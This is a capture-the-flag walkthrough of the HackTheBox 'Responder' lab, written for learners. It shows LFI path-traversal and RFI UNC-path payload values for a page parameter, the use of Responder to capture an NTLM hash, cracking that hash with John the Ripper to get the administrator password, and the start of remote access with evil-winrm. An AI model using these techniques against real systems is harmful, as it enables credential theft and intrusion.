HackTheBox Lab: Responder

September 17, 2025 HackTheBox Easy

Challenge Overview:

  • The following was the description for the challenge: responder

Approach

When visiting the web service using the IP address, what is the domain that we are being redirected to?
responder
Which scripting language is being used on the server to generate webpages? responder
What is the name of the URL parameter which is used to load different language versions of the webpage?

  • So ofcourse, to answer to this question we need to visit the website, but see the following error. responder
    -> As you paste the ip address, from the search bar, you will notice something, and that is, the url loads for a while meaning just as we have seen from the terminal that we got the status code of 200. but then after a while, we get an error.
    -> So this is where Domain Name Server (DNS), comes in. DNS, first check if the redirection url has an ip-address, and we see that, it leads to nothing, even when we write directly that url on the search bar.
    -> So an easier way, or to make this work is by including it to our local hosts.
    -> But again, we should of course not expect anything from just the IP-address 10.129.6.127, because we see that, it’s source code, only has html tags thatjust tells the browser to redirect to “htb” after 0 seconds.
    -> Hence, when we resolve this IP 10.129.6.127 to unika.htb from /etc/hosts: responder
    • So after doing so, we see some good news!! responder
      -> But answering the question, we navigate to the language button (check below where i have highlighted), and i have also highlighted the answer, which is the page parameter.
      responder
    • And we also see that the language is in french now. And, that’s what we have to exploit.

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”?
responder
-> But to answer the question, the answer is ../../../../../../../../windows/system32/drivers/etc/hosts

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”?
-> The answer to this one is //10.10.14.6/somefile.

What does NTLM stand for?
-> New Technology LAN Manager.
-> NT: Refers to the “NT” line of Microsoft Windows operating systems (e.g., Windows NT, 2000, XP, Vista, 7, 10, 11).
-> LAN: Stands for Local Area Network. This highlights its original purpose for authentication within a local network.
-> Manager: Refers to the suite of protocols that manage the authentication process.
responder
-> We will see later, on how we can do this (brute-forcing).

Which flag do we use in the Responder utility to specify the network interface?

  • -I: interfaces like eth0, tun0.

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

  • John the ripper
    responder

What is the password for the administrator user?

  • This is where, we use the power of Responder
  • Responder is a powerful Post-Exploitation and Network Penetration Testing tool. Its primary purpose is to poison or abuse network protocols to capture authentication credentials from other computers on the same local network.
  • But in simple Responder tricks computers into handing over their password hashes by pretending to be trusted network resources.
  • Note that it says it’s post-exploitation tool, meaning there are some things we have to do before using.
  • In this case, here is what we have to do first; using the following command ip a, to get our network interface; Normally you would use, eth0 but because i am using a vpn, i have to go for tun0. responder
    -> From here we take the following address (responder address): responder
    -> And this is how we implement the Remote File Inclusion (RFI): responder
    -> And when we go back to the terminal, we some interesting info: responder
    -> So we see that we get some credentials, and the password that is hashed. So now we have to crack the hashed password. You can either use the hashcat tool or john the ripper, but in this case i will be using john: responder
    -> Now that we have all the information: responder
    -> we see that the password is cracked badminton, and hence that is our answer.

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
responder

Submit root flag

  • Now that we have the credentials, we can have remotely access to their machine.
  • Through the following tool evil-winrm, and hence you can install it as follows: 
    sudo gem install evil-winrm